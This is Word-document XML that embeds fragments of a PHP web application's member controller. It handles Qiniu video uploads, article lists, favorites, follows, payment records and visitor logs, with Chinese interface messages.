    <w:p w14:paraId="3A3F5C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C8C7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09057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7DD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$file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A58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027C0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002F4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708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088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videoUpload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293DE2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623B8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63599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7F7F71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574261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28A03B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260F2B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2EF908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$pipeline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C954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$db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C604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679726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$savekey = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C39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$fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006485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$wenurl = config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B509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$policy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69CF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'persistentOps' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A0F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'persistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50335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'persistentNotifyUrl' =&gt; $wenurl . '/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D5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D084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$uptoken = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E6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request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C95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6DA9A8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20B65B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$uploadMgr-&gt;putFile($uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0E1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4A0A75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E46E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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515923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63A604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FFF1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FD58C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E77C8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p>
    <w:p w14:paraId="744807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'persistentId' =&gt; $ret['persistentId'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4BCB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=&gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA6A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5647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F4BB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BE5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CDE7E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request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF44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24F46F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'wtt' . substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . "." . $ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506FD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6D2591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5543BD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22B81D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0C5FBE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501436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32897A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$pipeline = 'abc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20EB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"avthumb/mp4/s/640x360/vb/1.25m";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8C2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$savekey = \Qiniu\base64_urlSafeEncode($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E554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$fops = $fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4F2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$policy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF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'persistentOps' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0B7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'persistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B66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025B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$uptoken = $auth-&gt;uploadToken($bucket, $key, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EB4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15C18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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B2A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EEF74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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6341F4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743E43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B3CF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3B6E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270B8E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$uploadMgr-&gt;putFile($uptoken, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015849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32FEF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var_dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6734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14A0D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var_dump($ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDC3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526B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1EE3EF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 = request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29625C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$filePath = $file-&gt;getRealPath();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A46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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE56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6462C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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27E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3E49F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358F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C32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 = pathinfo($file-&gt;getInfo('name'), PATHINFO_EXTENSION);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F30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'wtt' . substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . "." . $ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709CB2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4675C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db::name('member_config')-&gt;where(['type' =&gt; 'sdkQiniu'])-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5ABB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69C850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44C13A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43E400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1CE81C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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABD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$auth-&gt;uploadToken($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B70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$uploadMgr = new UploadManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963DB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$uploadMgr-&gt;putFile($token, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F59F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77FE37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EA9F6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$err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09676D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FD37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54C8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29517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CB368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$ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABE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41ED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3959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file_put_contents("video.txt", var_export($ret, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2946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file_put_contents("video2.txt", var_export($err, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79D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7A8B4B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($info) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDCE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'/public/uploads/weitoutiao/video/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11E5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 = str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9CF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8B30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$img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D662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9E7D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file_put_contents("video.txt", var_export($img, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C317E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1BD70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B7F4B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$file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8440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05A52A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6D11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3AC8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23BA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articleList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC98D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5757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 input('param.money') ? input('param.money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C1DA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input('param.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ECE0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input('param.data') ? input('param.data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A87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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD71B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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43402F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($money) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FB2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($money == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E9D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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54C5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234F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 = $money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15548D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D487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669B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7E55E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 = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF690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09A4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1A06D7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$where['data'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139496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6621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57148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Db::name('article')-&gt;where($where)-&gt;order('des desc,id desc')-&gt;field('id,title,typeid,style,flags,des,tags,image,click,keywords,description,create_time,update_time,content,hide,source,writer')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8BF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$hide = [0 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 1 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 2 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 3 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F17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78B019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$data['data'][$k]['create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8F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$data['data'][$k]['update_time'] = date('Y-m-d H:i:s', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682C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$data['data'][$k]['hides'] = $hide[$v['hide']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8F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1BA8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150959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CC97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articleView()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBA8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D8D1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$id = input('param.id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6C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4BE5E0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D1F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文章</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2F03D8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41A022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5AA0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D555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Db::name('article')-&gt;where(['id' =&gt; $id, 'uid' =&gt; $this-&gt;memberId])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554BEC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9D1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9DEE3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文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C86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01F072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7154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B543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$article]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE96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421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favoriteAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324400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C6A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 ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068E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2BD1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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D5C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4F02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47189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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F19A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B8D2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347A60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5D20A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75E67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254AA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AE0B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F65B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$shou = Db::name('member_favorite')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'aid' =&gt; $aid, 'type' =&gt; 0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13D0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($shou) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3BE0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7166E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您已经收藏过了，在会员中心查看我的收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42995B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104D5A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A1F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A221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35FA7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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65376F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1AB2F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Db::name('member_favorite')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB25A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B4221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收藏</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$aid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C9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05DB87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已收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E746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8E37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AEB8A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193FF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收藏失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450735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'errcode' =&gt; 501,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093E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4916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EBA3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6DDB55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7B8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favoriteDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29243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8BF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 ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5423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5E98B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'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA40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F8E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120916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$aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3E4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8BB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156C6B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B63D5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40114E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72F3D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31AC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A487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Db::name('member_favorite')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'aid' =&gt; $aid, 'type' =&gt; 0])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBA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22773F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_records($this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除收藏</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$aid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCBA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0A39D3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取消收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767FC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4FB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D6AD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676AA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取消失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B922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36672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03F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A434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B6CD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3510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payRecords()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D68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843C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$status = input('param.status') ? input('param.status') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D4C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input('param.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4ED0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$sctype = input('param.sctype') ? input('param.sctype') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B51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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3C7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E387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'status' =&gt; 'in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D82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'in:1,2,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E1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'sctype' =&gt; 'in:0,1,2|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38878E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436509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3391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536FD5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'status' =&gt; $status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456DB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1321C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'sctype' =&gt; $sctype,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269E7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'pages' =&gt; $pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6F0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9560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76A2CB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E6CE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1409CD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7226A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6A5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9D60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($status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FB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$where['status'] = $status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C31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E6E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32657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$where['type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC0E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CF5D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($sctype) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42F1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$where['sctype'] = $sctype;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F90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93D5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0583A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Db::name('pay_record')-&gt;where($where)-&gt;order('id desc')-&gt;field('id,money,status,type,ip,info,sctype,scookies,create_time')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6A7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$sctype = [0 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>充值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 1 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消费</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 2 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>购买</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VIP'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA68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3CA76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$data['data'][$k]['sctype'] = $sctype[$v['sctype']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF901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$data['data'][$k]['create_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B49C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$data['data'][$k]['money'] = $data['data'][$k]['money'] / 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF041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11CF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940BC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9ABC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guanzhu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E62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7BE4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 input('param.gz_uid/d') ? input('param.gz_uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B24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4A91C9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=&gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF6C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1463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22A44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=&gt; $gz_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A860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8099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7A988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98FA2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264E98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3037B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9C93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CBF2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1326BA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$shou = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFFE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($shou) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79550D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EED4B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您已经关注过了，在我的查看我的关注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00743F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06A328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4E82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EE2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$where['uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFB9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$where['gz_uid'] = $gz_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE00B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1730D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Db::name('member_guanzhu')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470445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9E4A3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_records($uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注会员</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$gz_uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2353B7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5DAFD9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关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2525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28F2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7E86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5A131F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关注失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB783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5D30BD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E1C0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A387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68A298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C4BE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guanzhuDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D133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BC0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 input('param.gz_uid/d') ? input('param.gz_uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB99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21F593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=&gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FAA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9C33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3380FE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=&gt; $gz_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2B0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31D3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5296C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CD7C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7E2E60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43B5B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31A8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293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47DF6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Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2DD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48E55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_records($uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取消关注会员</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$gz_uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C1F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433607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取消成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA6E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3A3E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E8F3B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47E815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取消失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F3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03E7D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FB14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6050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2001D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C455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guanzhuList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41191C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6E1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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB50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input('param.type') ? input('param.type') : '';     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32170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(!$type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EAC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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9979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CCD0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7C54B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58B32D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'number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD28B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4C1A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569398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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F22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17B897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F9407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0CEBF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3301A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77715D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32EE5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2D53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F84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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4C1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$auid = 'a.gz_uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFB6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$where['a.uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121728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D7E9B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$auid = 'a.uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1AB6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$where['a.gz_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB0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440A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15657E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['__MEMBER__ w', $auid . '=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B397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C8B6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Db::name('member_guanzhu')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.id desc')-&gt;field('w.id,w.img')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC66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7CFC4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_user($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED0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2166E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0469F4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$data['data'][$k]['qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE02A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$data['data'][$k]['guanzhu'] = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D49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3A2A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7A71E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B605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fangke()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F302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B1A5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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32B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771F66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0ABCE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1F0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2F51C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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048AC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05AC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57C15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E7BC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5CFE3B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'errcode' =&gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204621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7AE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3BEA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$where['f_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA39A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Db::name('member_fangke')-&gt;where($where)-&gt;field('uid')-&gt;order('id desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E76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4ECDE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4C70BB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$data['data'][$k]['id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE866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3DA76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59EC5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Db::name('member_fangke')-&gt;where(['uid' =&gt; $v['uid']])-&gt;order('id desc')-&gt;value('time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42D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 = "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问时间：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" . date('m-d H:i', $time);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE89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$data['data'][$k]['guanzhu'] = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B59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C61F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5AB6C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74AF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fangkejilu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383FA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3D4A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$f_uid = input('param.f_uid/d') ? input('param.f_uid/d') : '';</w:t>
      </w:r>
    </w:p>
